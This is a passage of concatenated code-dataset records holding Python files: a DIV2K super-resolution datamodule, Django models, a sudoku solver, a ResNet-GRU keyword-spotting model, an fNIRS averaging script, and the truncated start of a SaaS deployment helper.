*args, **kwargs):\n super().__init__()\n\n self.data_dir = kwargs[\"data_dir\"]\n\n self.train_dataloader_params = kwargs[\"train_dataloader_params\"]\n self.val_dataloader_params = kwargs[\"val_dataloader_params\"]\n self.test_dataloader_params = kwargs[\"test_dataloader_params\"]\n\n # self.batch_size = kwargs[\"batch_size\"]\n # self.num_workers = kwargs[\"num_workers\"]\n # self.pin_memory = kwargs[\"pin_memory\"]\n\n self.inp_size = kwargs[\"inp_size\"]\n self.scale_range = kwargs[\"scale_range\"]\n self.sample_q = kwargs[\"sample_q\"]\n\n self.transforms = transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n )\n\n # self.dims is returned when you call datamodule.size()\n # self.dims = (1, 28, 28)\n\n self.data_train: Optional[Dataset] = None\n self.data_val: Optional[Dataset] = None\n\n def prepare_data(self):\n \"\"\"Download data if needed. This method is called only from a single GPU.\n Do not use it to assign state (self.x = y).\"\"\"\n # MNIST(self.data_dir, train=True, download=True)\n # MNIST(self.data_dir, train=False, download=True)\n # Can write a download program to replace dowload \n pass\n\n\n def setup(self, stage=None):\n \"\"\"Load data. Set variables: self.data_train, self.data_val.\"\"\"\n\n # 1. 
augment\n augument_transforms = transforms.Compose([RandomHorizontalFlip(p=0.5), RandomVerticalFlip(p=0.5), RandomDFlip(p=0.5)])\n\n # train dataset\n trainset = DIV2KDataset(root=self.data_dir, train= True, transform=transforms.Compose([self.transforms, augument_transforms]))\n trainset = ContinuesSRDataset(dataset=trainset, inp_size=self.inp_size, scale_range=self.scale_range)\n trainset = ImplicitImageDataset(dataset=trainset, sample_q=self.sample_q)\n\n # validation dataset\n valset = DIV2KDataset(root=self.data_dir, train=False, transform=self.transforms)\n valset = ContinuesSRDataset(dataset=valset, inp_size=self.inp_size, scale_range=self.scale_range)\n valset = ImplicitImageDataset(dataset=valset, sample_q=self.sample_q)\n\n self.data_train, self.data_val = trainset, valset\n\n def train_dataloader(self):\n return DataLoader(\n dataset=self.data_train,\n batch_size=self.train_dataloader_params.batch_size,\n num_workers=self.train_dataloader_params.num_workers,\n pin_memory=self.train_dataloader_params.pin_memory,\n shuffle=self.train_dataloader_params.shuffle,\n )\n\n def val_dataloader(self):\n return DataLoader(\n dataset=self.data_val,\n batch_size=self.val_dataloader_params.batch_size,\n num_workers=self.val_dataloader_params.num_workers,\n pin_memory=self.val_dataloader_params.pin_memory,\n shuffle=self.val_dataloader_params.shuffle,\n )\n\n def test_dataloader(self):\n testset_2 = DIV2KDatasetPaired(root=self.data_dir, scale=2, shared_transform=self.transforms)\n testset_2 = ImplicitImageDataset(dataset=testset_2)\n\n testset_3 = DIV2KDatasetPaired(root=self.data_dir, scale=3, shared_transform=self.transforms)\n testset_3 = ImplicitImageDataset(dataset=testset_3)\n\n testset_4 = DIV2KDatasetPaired(root=self.data_dir, scale=4, shared_transform=self.transforms)\n testset_4 = ImplicitImageDataset(dataset=testset_4)\n\n test_dataloader_2 = DataLoader(\n dataset=testset_2,\n batch_size=self.test_dataloader_params.batch_size,\n 
num_workers=self.test_dataloader_params.num_workers,\n pin_memory=self.test_dataloader_params.pin_memory,\n shuffle=self.test_dataloader_params.shuffle,\n )\n\n test_dataloader_3 = DataLoader(\n dataset=testset_3,\n batch_size=self.test_dataloader_params.batch_size,\n num_workers=self.test_dataloader_params.num_workers,\n pin_memory=self.test_dataloader_params.pin_memory,\n shuffle=self.test_dataloader_params.shuffle,\n )\n\n test_dataloader_4 = DataLoader(\n dataset=testset_4,\n batch_size=self.test_dataloader_params.batch_size,\n num_workers=self.test_dataloader_params.num_workers,\n pin_memory=self.test_dataloader_params.pin_memory,\n shuffle=self.test_dataloader_params.shuffle,\n )\n return [test_dataloader_2, test_dataloader_3, test_dataloader_4]","sub_path":"src/datamodules/DIV2K_datamodule.py","file_name":"DIV2K_datamodule.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"118990149","text":"from django.contrib.postgres.fields import ArrayField, JSONField\nfrom django.db import models\n\n\nclass Book(models.Model):\n name = models.CharField(max_length=255)\n authors = models.ManyToManyField(\n 'library.Author',\n related_name='books',\n null=True\n )\n\n\nclass Author(models.Model):\n name = models.CharField(max_length=50)\n last_name = models.CharField(max_length=50, null=True)\n age = models.IntegerField(null=True)\n\n def __str__(self):\n return \"{} - {}\".format(\n self.name, self.age\n )\n\nimport random\n\n\ndef random_1_1000():\n return random.randint(1, 1000)\n\n\nclass TestField(models.Model):\n char_field = models.CharField(max_length=50, null=True)\n float_field = models.FloatField(\n verbose_name='My float name',\n help_text='help text',\n primary_key=False,\n null=True,\n blank=True,\n default=1.0\n )\n boolean_field = models.BooleanField(default=False)\n big_int_field = models.BigIntegerField(\n unique=True,\n null=True\n )\n positive_field = 
models.PositiveIntegerField(\n db_index=True,\n null=True\n )\n small_int_field = models.SmallIntegerField(\n default=random_1_1000,\n null=True\n )\n positive_small_int_field = models.PositiveSmallIntegerField(\n null=True\n )\n text_field = models.TextField(\n null=True\n )\n datetime_field = models.DateTimeField(\n null=True\n )\n date_field = models.DateField(\n null=True\n )\n time_field = models.TimeField(\n null=True\n )\n null_boolean_field = models.NullBooleanField()\n slug_field = models.SlugField(\n null=True\n )\n array_field = ArrayField(models.IntegerField(), default=list)\n json_field = JSONField(default=dict)\n\n created_at = models.DateTimeField(auto_now_add=True, null=True)\n updated_at = models.DateTimeField(auto_now=True, null=True)\n\n file_field = models.FileField(null=True)\n image_field = models.ImageField(null=True)\n binary_field = models.BinaryField(null=True)\n\n class Meta:\n verbose_name = 'my class name'\n verbose_name_plural = 'my class names'\n # ordering = ('-create_at', 'char_field')\n index_together = (\n ('date_field', 'created_at'),\n ('updated_at', 'slug_field', 'array_field')\n )\n unique_together = (\n ('date_field', 'created_at'),\n )\n\n# TestField.objects.filter(big_int_field__isnull=True)\n# TestField.objects.filter(big_int_field__range=[1, 3])\n# TestField.objects.filter()\n#\n#\n# class User(models.Model):\n# username = models.CharField(max_length=255)\n# first_name = models.CharField(max_length=255)\n# last_name = models.CharField(max_length=255)\n#\n# class Meta:\n# abstract = True\n#\n#\n# class Employee(User):\n# clothes = models.TextField()\n#\n#\n# class Manager(User):\n# salary = models.IntegerField()\n#\n# def get_salary(self):\n# return self.salary\n#\n#\n# class Boss(Manager):\n# def get_salary(self):\n# return self.salary * 10\n#\n# class Meta:\n# proxy = 
True\n\n","sub_path":"library/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69834733","text":"import pathlib\nimport typing as tp\n\nT = tp.TypeVar(\"T\")\n\n\ndef read_sudoku(path: tp.Union[str, pathlib.Path]) -> tp.List[tp.List[str]]:\n path = pathlib.Path(path)\n with path.open() as f:\n puzzle = f.read()\n return create_grid(puzzle)\n\n\ndef create_grid(puzzle: str) -> tp.List[tp.List[str]]:\n digits = [c for c in puzzle if c in \"123456789.\"]\n grid = group(digits, 9)\n return grid\n\n\ndef display(grid: tp.List[tp.List[str]]) -> None:\n \n width = 2\n line = \"+\".join([\"-\" * (width * 3)] * 3)\n for row in range(9):\n print(\n \"\".join(\n grid[row][col].center(width) + (\"|\" if str(col) in \"25\" else \"\") for col in range(9)\n )\n )\n if str(row) in \"25\":\n print(line)\n print()\n\n\ndef group(values: tp.List[T], n: int) -> tp.List[tp.List[T]]:\n \n return ( [values[n*k:n*(k+1)] for k in range (n)]) \n\n\ndef get_row(grid: tp.List[tp.List[str]], pos: tp.Tuple[int, int]) -> tp.List[str]:\n \n return (grid[pos[0]])\n\n\ndef get_col(grid: tp.List[tp.List[str]], pos: tp.Tuple[int, int]) -> tp.List[str]:\n \n a=[]\n for i in range (len(grid)):\n a.append(grid[i][pos[1]])\n return (a)\n\n\ndef get_block(grid: tp.List[tp.List[str]], pos: tp.Tuple[int, int]) -> tp.List[str]:\n \n a=pos[0]//3*3\n b=pos[1]//3*3\n sq=[]\n for i in range (3):\n for j in range (3):\n sq.append(grid[a+i][b+j])\n return(sq)\n\ndef find_empty_positions(grid: tp.List[tp.List[str]]) -> tp.Optional[tp.Tuple[int, int]]:\n \n for i in range (len(grid)):\n for j in range (len(grid[i])):\n if (grid[i][j]=='.'):\n return (i, j)\n return (0)\n \ndef find_possible_values(grid: tp.List[tp.List[str]], pos: tp.Tuple[int, int]) -> tp.Set[str]:\n \n a=set()\n for j in range (1,10):\n i=str(j)\n if (i not in get_block(grid, pos)) and (i not in get_row(grid, pos)) 
and (i not in get_col(grid, pos)):\n a.add(i) \n return(a)\n\n\ndef solve(grid: tp.List[tp.List[str]]) -> tp.Optional[tp.List[tp.List[str]]]:\n \n def check(grid: tp.List[tp.List[str]]):\n liz=find_empty_positions(grid)\n if (liz==0):\n return (True)\n else:\n sett=find_possible_values(grid, (liz[0], liz[1]))\n listt=list(sett)\n if (len(listt))==0:\n return (False)\n else:\n for i in listt:\n grid[liz[0]][liz[1]]=i\n if check(grid)==True:\n return(True)\n else:\n grid[liz[0]][liz[1]]=\".\"\n check(grid)\n return(grid) \n\ndef check_solution(solution: tp.List[tp.List[str]]) -> bool:\n \n for i in range (len(solution)):\n for j in range (len(solution)):\n ij=(i,j)\n col=set(get_col(solution, ij))\n row=set(get_row(solution, ij))\n block=set(get_block(solution, ij))\n if (len(col)!=9 or len(row)!=9 or len(block)!=9 or (\".\" in col) or (\".\" in row) or (\".\" in block) ):\n return (False)\n return (True)\n \n \n \ndef generate_sudoku(N: int) -> tp.List[tp.List[str]]:\n import random\n \n grid_dot = [[\".\" for i in range (9)] for j in range (9)]\n grid=solve(grid_dot)\n N=81-N\n while N>0:\n display(grid)\n point1=random.randint(0,8)\n point2=random.randint(0,8)\n if (grid[point1][point2]!= \".\"):\n grid[point1][point2]=\".\"\n N-=1\n return (grid)\n\n\nif __name__ == \"__main__\":\n for fname in [\"puzzle1.txt\", \"puzzle2.txt\", \"puzzle3.txt\"]:\n grid = read_sudoku(fname)\n display(grid)\n solution = solve(grid)\n if not solution:\n print(f\"Puzzle {fname} can't be solved\")\n else:\n display(solution)\n","sub_path":"homework02/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"81577949","text":"# coding=UTF-8\n\nfrom django.contrib.staticfiles import finders\nfrom django.contrib.staticfiles.templatetags import staticfiles\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom 
django.utils.formats import date_format\nfrom django.utils.timezone import now\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.dateformat import DateFormat\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\n\n\nclass PictureURL(object):\n \"\"\"\n Classe pour récuperer l'URL d'une image, ou l'URL par défaut si image vide\n \"\"\"\n @staticmethod\n def get_url(img=None, default=None):\n if img:\n return reverse_lazy('url_public', args=(img.name[2:]\n if img.name.startswith('./')\n else img.name,))\n if default:\n return staticfiles.static(default)\n return staticfiles.static('img/no-image-yet.jpg')\n\n\nclass ObjectsStillValidManager(models.Manager):\n def still_valid(self):\n return self.get_queryset().filter(date_v_fin__exact=None)\n\n def still_valid_distinct(self):\n return self.get_queryset().filter(date_v_fin__exact=None).distinct()\n\n\nclass BaseModel(models.Model):\n date_creation = models.DateTimeField(auto_now_add=True,\n verbose_name=_('Created'))\n date_last_modif = models.DateTimeField(auto_now=True,\n verbose_name=_('Last changed'))\n date_v_debut = models.DateTimeField(\n default=timezone.now,\n editable=True,\n verbose_name=_(\"V. start\")\n )\n date_v_fin = models.DateTimeField(\n default=None,\n null=True,\n editable=True,\n verbose_name=_(\"V. end\"),\n blank=True\n )\n objects = ObjectsStillValidManager()\n\n @staticmethod\n def format_date(value):\n return DateFormat(value).format('d/m/Y, H:i') if value else _('Infini')\n\n @staticmethod\n def to_str(value, default='?'):\n return str(value) if value else default\n\n \"\"\"\n Sur http://stackoverflow.com, solution pour ajouter un champ en lecture\n seule qui affiche l'image d'un champ de type models.ImageField() :\n /questions/16307307/django-admin-show-image-from-imagefield\n Seul hic, mais ça convient pour l'instant à mes besoins : il va chercher\n une propriété en dur. 
Moi je l'ai bêtement nommé propriété \"image\".\n \"\"\"\n def image_tag(self):\n if self.image:\n return ''.format(\n reverse_lazy('url_public', args=(self.image,))\n )\n else:\n return _('(Empty)')\n\n image_tag.short_description = 'Image'\n image_tag.allow_tags = True\n\n @staticmethod\n def date_relative(d, most_recent=None):\n if d is None:\n return _('No date')\n if most_recent is None:\n diff = now() - d\n else:\n diff = most_recent - d\n s = diff.seconds\n if diff.days > 7 or diff.days < 0:\n if d.year == now().year:\n return date_format(d, 'MONTH_DAY_FORMAT', use_l10n=True)\n return date_format(d, 'SHORT_DATE_FORMAT', use_l10n=True)\n elif diff.days == 1:\n return _(\"1 day ago\")\n elif diff.days > 1:\n return _(\"{} days ago\").format(diff.days)\n elif s <= 1:\n return _(\"Just now\")\n elif s < 60:\n return _(\"{} seconds ago\").format(s)\n elif s < 120:\n return _(\"1 minute ago\")\n elif s < 3600:\n return _(\"{} minutes ago\").format(s / 60)\n elif s < 7200:\n return _(\"1 hour ago\")\n else:\n return _(\"{} hours ago\").format(s / 3600)\n\n def date_creation_relative(self):\n return self.date_relative(self.date_creation)\n\n class Meta:\n abstract = True\n ordering = ['date_v_debut']\n\n\nclass ManyToManyStillValid(models.ManyToManyField):\n\n def all_valid(self):\n return self.all().filter(date_v_fin__null=True)\n\n\n@python_2_unicode_compatible\nclass Langue(BaseModel):\n nom = models.CharField(max_length=50)\n nom_local = models.CharField(max_length=50, default='')\n locale = models.CharField(max_length=2) # (e.g. \"fr\")\n bidirectionnel = models.BooleanField(default=False)\n active = models.BooleanField(default=False)\n\n def url_drapeau(self):\n if not self.locale:\n return None\n # path codé en dur, ça ne devrait jamais changer :\n a = 'img/flags/flag-{}-s.png'.format(self.locale)\n # ! 
Astuce : finder de django :\n if not finders.find(a):\n return None\n return staticfiles.static(a)\n\n def __str__(self):\n return '{} / {}{}'.format(\n self.locale, self.nom, (_(\"- activated\") if self.active else \"\")\n )\n\n class Meta(BaseModel.Meta):\n verbose_name_plural = _(\"Languages\")\n\n\nclass BaseTranslatableModel(BaseModel):\n langue = models.ForeignKey(Langue, on_delete=models.PROTECT)\n\n class Meta(BaseModel.Meta):\n abstract = True\n\n\n@python_2_unicode_compatible\nclass Texte(BaseTranslatableModel):\n texte = models.CharField(max_length=200)\n\n def __str__(self):\n return self.texte\n\n class Meta(BaseTranslatableModel.Meta):\n verbose_name = _(\"Text\")\n\n\n","sub_path":"app/models/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122551417","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n# pylint: disable=E1101, W0612\n\n\"\"\"\nResNet architecture adapted to 1-d case from:\nhttps://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\n\"\"\"\n\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ntorch.set_default_tensor_type('torch.FloatTensor')\n\nclass BasicBlock(nn.Module):\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.kernel_size = 15\n self.padding = 7\n self.conv1 = nn.Conv1d(inplanes, planes, kernel_size=self.kernel_size, stride=stride, padding=self.padding, bias=False)\n self.bn1 = nn.BatchNorm1d(planes) \n self.relu = nn.ReLU(inplace=True) \n self.conv2 = nn.Conv1d(planes, planes, stride=1, kernel_size=self.kernel_size, padding=self.padding, bias=False)\n self.bn2 = nn.BatchNorm1d(planes)\n self.downsample = downsample \n self.stride = stride \n\n def forward(self, x):\n residual = x\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = 
self.conv2(out)\n out = self.bn2(out)\n if self.downsample is not None:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n\n return out\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, mode):\n super(ResNet, self).__init__()\n self.mode = mode #added from 3-step training of the model\n self.inplanes = 64\n self.dim = 125 #added for convenience to test different kernel parameters for conv1\n self.conv1 = nn.Conv1d(1, 64, kernel_size=80, stride=16, padding=38, bias=False)\n self.bn1 = nn.BatchNorm1d(64)\n self.relu = nn.ReLU(inplace=True)\n self.layer1 = self._make_layer(block, 64, 2)\n self.layer2 = self._make_layer(block, 128, 2, stride=2)\n self.layer3 = self._make_layer(block, 256, 2, stride=2)\n self.layer4 = self._make_layer(block, 512, 2, stride=2)\n self.fc1 = nn.Linear(512, 512)\n \n self.backend_conv1 = nn.Sequential(\n nn.Conv1d(self.dim, 2*self.dim, 5, 2, 0, bias=False),\n nn.BatchNorm1d(2*self.dim),\n nn.ReLU(True),\n nn.MaxPool1d(2, 2),\n nn.Conv1d(2*self.dim, 4*self.dim, 5, 2, 0, bias=False),\n nn.BatchNorm1d(4*self.dim),\n nn.ReLU(True),\n )\n self.backend_conv2 = nn.Sequential(\n nn.Linear(4*self.dim, self.dim),\n nn.BatchNorm1d(self.dim),\n nn.ReLU(True),\n nn.Linear(self.dim, 12)\n )\n\n for m in self.modules():\n if isinstance(m, nn.Conv1d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm1d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes:\n downsample = nn.Sequential(\n nn.Conv1d(self.inplanes, planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm1d(planes),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n \n\n def forward(self, x):\n 
x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n #batch_size x features(512) x sequence_length\n x = torch.transpose(x,1,2)\n x = x.contiguous()\n bs = x.size(0)\n sl = x.size(1)\n x = x.view(bs*sl, -1)\n x = self.fc1(x)\n\n if self.mode == 1:\n x = x.view(bs, sl, 512) \n x = self.backend_conv1(x)\n x = torch.mean(x, 2)\n x = self.backend_conv2(x)\n \n else:\n x = x.view(bs, sl, 512)\n \n return x\n\nclass GRU(nn.Module):\n\n def __init__(self, num_features = 512, num_layers = 2):\n super(GRU, self).__init__()\n self.gru = nn.GRU(512, hidden_size = num_features, num_layers = num_layers, bidirectional = True, batch_first = True)\n self.fc2 = nn.Linear(num_features*2, 12)\n\n def forward(self, x):\n x, _ = self.gru(x)\n x = self.fc2(x[:, -1, :]) \n return x\n\nclass Network(nn.Module):\n def __init__(self, num_features = 512, num_layers = 2, mode = 0):\n super(Network, self).__init__()\n self.mode = mode\n self.resnet = ResNet(BasicBlock, mode = mode)\n self.gru = GRU(num_features=num_features, num_layers=num_layers)\n\n def forward(self, x):\n x = x.type(torch.FloatTensor).unsqueeze(1).to(DEVICE)\n x = self.resnet(x)\n if self.mode != 1:\n x = self.gru(x)\n return x\n\ndef accuracy(model, dataset, filename, batchsize=2):\n \"\"\"\n Computes overall accuracy on the dataset provided\n \"\"\"\n total, correct = 0, 0\n model.eval()\n dataloader = DataLoader(dataset, batch_size = batchsize, drop_last = False)\n\n with torch.no_grad():\n for i_batch, batch in enumerate(dataloader):\n outputs = model(batch['audio'])\n _, predicted = torch.max(outputs.data, 1)\n total += batchsize\n correct += (predicted == batch['label'].to(DEVICE)).sum().item()\n\n with open(filename, 'a') as f:\n f.write(str(100 * correct / float(total))+'\\n')\n model.train()\n return(100*correct/float(total))\n\ndef class_accuracy(model, dataset, filename, batchsize=2):\n \"\"\"\n Computes per class accuracy 
on the dataset provided\n \"\"\"\n labels = ['yes','no','up','down','left','right','on','off','stop','go','unknown','silence']\n class_correct = list(0. for i in range(12))\n class_total = list(0. for i in range(12))\n model.eval()\n dataloader = DataLoader(dataset, batch_size = batchsize, drop_last = False)\n with torch.no_grad():\n for i_batch, batch in enumerate(dataloader):\n outputs = model(batch['audio'])\n _, predicted = torch.max(outputs.data, 1)\n c = (predicted == batch['label'].to(DEVICE)).squeeze()\n\n for i in range(batchsize):\n label = batch['label'][i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n with open(filename, 'w') as myFile:\n for i in range(12): \n myFile.write('Accuracy of %5s : %2d %%' % (\n labels[i], 100 * class_correct[i] / class_total[i])+'\\n')\n model.train()","sub_path":"models/model_resnet_bgru.py","file_name":"model_resnet_bgru.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"652407565","text":"#coding:utf-8\n\n# from module.emg_processing import window_rms\nfrom module.import_data import Import_data\nfrom module.delete_data import Delete_data\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport numpy as np\nimport pylab\nimport csv\n\n\"\"\"\nt検定の準備\n\"\"\"\n# データが格納されている作業ディレクトリまでパス指定\nos.chdir(\"/Users/chiaki/Desktop/\")\n\nprint('読み込むファイル名を入力してください')\nfile_name = input()\n\nresult_f = pd.DataFrame(columns=[])\nset_time = int(40)\n\n# ---ファイル読み込み---\ndf = pd.read_csv(file_name + '.csv', sep=',')\ndf.columns = ['index', 'index2','time','ch1_oxy', 'ch1_deoxy',\n 'ch2_oxy', 'ch2_deoxy', 'ch3_oxy', 'ch3_deoxy',\n 'ch4_oxy', 'ch4_deoxy', 'ch5_oxy', 'ch5_deoxy',\n 'ch6_oxy', 'ch6_deoxy', 'ch7_oxy', 'ch7_deoxy',\n 'ch8_oxy', 'ch8_deoxy', 'ch9_oxy', 'ch9_deoxy',\n 'ch10_oxy', 'ch10_deoxy', 'ch11_oxy', 'ch11_deoxy',\n 'ch12_oxy', 'ch12_deoxy', 'ch13_oxy', 'ch13_deoxy',\n 'ch14_oxy', 'ch14_deoxy', 
'ch15_oxy', 'ch15_deoxy',\n 'ch16_oxy', 'ch16_deoxy', 'ch17_oxy', 'ch17_deoxy',\n 'ch18_oxy', 'ch18_deoxy', 'ch19_oxy', 'ch19_deoxy',\n 'ch20_oxy', 'ch20_deoxy', 'ch21_oxy', 'ch21_deoxy',\n 'ch22_oxy', 'ch22_deoxy', 'ch23_oxy', 'ch23_deoxy',\n 'ch24_oxy', 'ch24_deoxy', 'ch25_oxy', 'ch25_deoxy',\n 'ch26_oxy', 'ch26_deoxy', 'ch27_oxy', 'ch27_deoxy',\n 'ch28_oxy', 'ch28_deoxy', 'ch29_oxy', 'ch29_deoxy',\n 'ch30_oxy', 'ch30_deoxy', 'ch31_oxy', 'ch31_deoxy',\n 'ch32_oxy', 'ch32_deoxy', 'ch33_oxy', 'ch33_deoxy',\n 'ch34_oxy', 'ch34_deoxy', 'ch35_oxy', 'ch35_deoxy',\n 'ch36_oxy', 'ch36_deoxy', 'ch37_oxy', 'ch37_deoxy',\n 'ch38_oxy', 'ch38_deoxy', 'ch39_oxy', 'ch39_deoxy',\n 'ch40_oxy', 'ch40_deoxy', 'ch41_oxy', 'ch41_deoxy',\n 'ch42_oxy', 'ch42_deoxy', 'ch43_oxy', 'ch43_deoxy',\n 'ch44_oxy', 'ch44_deoxy', 'ch45_oxy', 'ch45_deoxy',\n 'ch46_oxy', 'ch46_deoxy', 'ch47_oxy', 'ch47_deoxy',\n 'ch48_oxy', 'ch48_deoxy', 'ch49_oxy', 'ch49_deoxy',\n 'ch50_oxy', 'ch50_deoxy', 'ch51_oxy', 'ch51_deoxy',\n 'ch52_oxy', 'ch52_deoxy', 'ch53_oxy', 'ch53_deoxy',\n 'ch54_oxy', 'ch54_deoxy', 'ch55_oxy', 'ch55_deoxy',\n 'ch56_oxy', 'ch56_deoxy', 'ch57_oxy', 'ch57_deoxy',\n 'ch58_oxy', 'ch58_deoxy', 'ch59_oxy', 'ch59_deoxy',\n 'ch60_oxy', 'ch60_deoxy', 'ch61_oxy', 'ch61_deoxy',\n 'ch62_oxy', 'ch62_deoxy', 'ch63_oxy', 'ch63_deoxy',\n 'ch64_oxy', 'ch64_deoxy', 'ch65_oxy', 'ch65_deoxy',\n 'ch66_oxy', 'ch66_deoxy', 'ch67_oxy', 'ch67_deoxy',\n 'ch68_oxy', 'ch68_deoxy',\n ]\n\n\nfor i in range(68):\n rest_ave_box = []\n task_ave_box = []\n for j in range(5):\n time_1 = int((j*set_time+4)/0.057)\n time_2 = int((j*set_time+10)/0.057 + 1)\n time_3 = int((j*set_time+14)/0.057)\n time_4 = int((j*set_time + 24) / 0.057 + 1)\n\n rest_ave = sum(df[time_1:time_2]['ch'+ str(i+1) + '_oxy'])/len(df[time_1:time_2]['ch'+ str(i+1) + '_oxy'])\n task_ave = sum(df[time_3:time_4]['ch' + str(i + 1) + '_oxy']) / len(df[time_3:time_4]['ch' + str(i + 1) + '_oxy'])\n rest_ave_box.append(rest_ave)\n 
task_ave_box.append(task_ave)\n result_f['ch'+ str(i+1) + '_rest'] = rest_ave_box\n result_f['ch' + str(i + 1) + '_task'] = task_ave_box\n\n# print(result_f)\n\n# ---書き出し---\nresult_f.to_csv(\"t_10s_\" + file_name + \".csv\")\nprint('OK')\n","sub_path":"Analysis/t_1.py","file_name":"t_1.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"588892810","text":"import os\nimport yaml\nimport json\nimport logging\n\nfrom github import Github\nfrom sretoolbox.container import Image\nfrom sretoolbox.utils import retry\n\nimport utils.threaded as threaded\nimport utils.secret_reader as secret_reader\n\nfrom utils.oc import OC, StatusCodeError\nfrom utils.openshift_resource import OpenshiftResource as OR\nfrom utils.state import State\nfrom reconcile.github_org import get_config\n\n\nclass SaasHerder():\n \"\"\"Wrapper around SaaS deployment actions.\"\"\"\n\n def __init__(self, saas_files,\n thread_pool_size,\n gitlab,\n integration,\n integration_version,\n settings,\n accounts=None):\n self.saas_files = saas_files\n self._validate_saas_files()\n if not self.valid:\n return\n self.thread_pool_size = thread_pool_size\n self.gitlab = gitlab\n self.integration = integration\n self.integration_version = integration_version\n self.settings = settings\n self.namespaces = self._collect_namespaces()\n if accounts:\n self._initiate_state(accounts)\n\n def _validate_saas_files(self):\n self.valid = True\n saas_file_name_path_map = {}\n for saas_file in self.saas_files:\n saas_file_name = saas_file['name']\n saas_file_path = saas_file['path']\n saas_file_name_path_map.setdefault(saas_file_name, [])\n saas_file_name_path_map[saas_file_name].append(saas_file_path)\n\n saas_file_owners = [u['org_username']\n for r in saas_file['roles']\n for u in r['users']]\n if not saas_file_owners:\n msg = 'saas file {} has no owners: {}'\n logging.warning(msg.format(saas_file_name, saas_file_path))\n\n 
duplicates = {saas_file_name: saas_file_paths\n for saas_file_name, saas_file_paths\n in saas_file_name_path_map.items()\n if len(saas_file_paths) > 1}\n if duplicates:\n self.valid = False\n msg = 'saas file name {} is not unique: {}'\n for saas_file_name, saas_file_paths in duplicates.items():\n logging.error(msg.format(saas_file_name, saas_file_paths))\n\n def _collect_namespaces(self):\n # namespaces may appear more then once in the result\n namespaces = []\n for saas_file in self.saas_files:\n managed_resource_types = saas_file['managedResourceTypes']\n resource_templates = saas_file['resourceTemplates']\n for rt in resource_templates:\n targets = rt['targets']\n for target in targets:\n namespace = target['namespace']\n # managedResourceTypes is defined per saas_file\n # add it to each namespace in the current saas_file\n namespace['managedResourceTypes'] = managed_resource_types\n namespaces.append(namespace)\n return namespaces\n\n def _initiate_state(self, accounts):\n self.state = State(\n integration=self.integration,\n accounts=accounts,\n settings=self.settings\n )\n\n @staticmethod\n def _collect_parameters(container):\n parameters = container.get('parameters') or {}\n if isinstance(parameters, str):\n parameters = json.loads(parameters)\n # adjust Python's True/False\n for k, v in parameters.items():\n if v is True:\n parameters[k] = 'true'\n elif v is False:\n parameters[k] = 'false'\n elif any([isinstance(v, t) for t in [dict, list, tuple]]):\n parameters[k] = json.dumps(v)\n return parameters\n\n @retry()\n def _get_file_contents(self, options):\n url = options['url']\n path = options['path']\n ref = options['ref']\n github = options['github']\n if 'github' in url:\n repo_name = url.rstrip(\"/\").replace('https://github.com/', '')\n repo = github.get_repo(repo_name)\n f = repo.get_contents(path, ref)\n return f.decoded_content, f.html_url\n elif 'gitlab' in url:\n if not self.gitlab:\n raise Exception('gitlab is not initialized')\n project = 
self.gitlab.get_project(url)\n f = project.files.get(file_path=path, ref=ref)\n html_url = os.path.join(url, 'blob', ref, path)\n return f.decode(), html_url\n\n def _get_commit_sha(self, options):\n url = options['url']\n ref = options['ref']\n github = options['github']\n hash_length = options.get('hash_length')\n commit_sha = ''\n if 'github' in url:\n repo_name = url.rstrip(\"/\").replace('https://github.com/', '')\n repo = github.get_repo(repo_name)\n commit = repo.get_commit(sha=ref)\n commit_sha = commit.sha\n elif 'gitlab' in url:\n if not self.gitlab:\n raise Exception('gitlab is not initialized')\n project = self.gitlab.get_project(url)\n commits = project.commits.list(ref_name=ref)\n commit_sha = commits[0].id\n\n if hash_length:\n return commit_sha[:hash_length]\n\n return commit_sha\n\n @staticmethod\n def _get_cluster_and_namespace(target):\n cluster = target['namespace']['cluster']['name']\n namespace = target['namespace']['name']\n return cluster, namespace\n\n def _process_template(self, options):\n saas_file_name = options['saas_file_name']\n resource_template_name = options['resource_template_name']\n url = options['url']\n path = options['path']\n hash_length = options['hash_length']\n target = options['target']\n parameters = 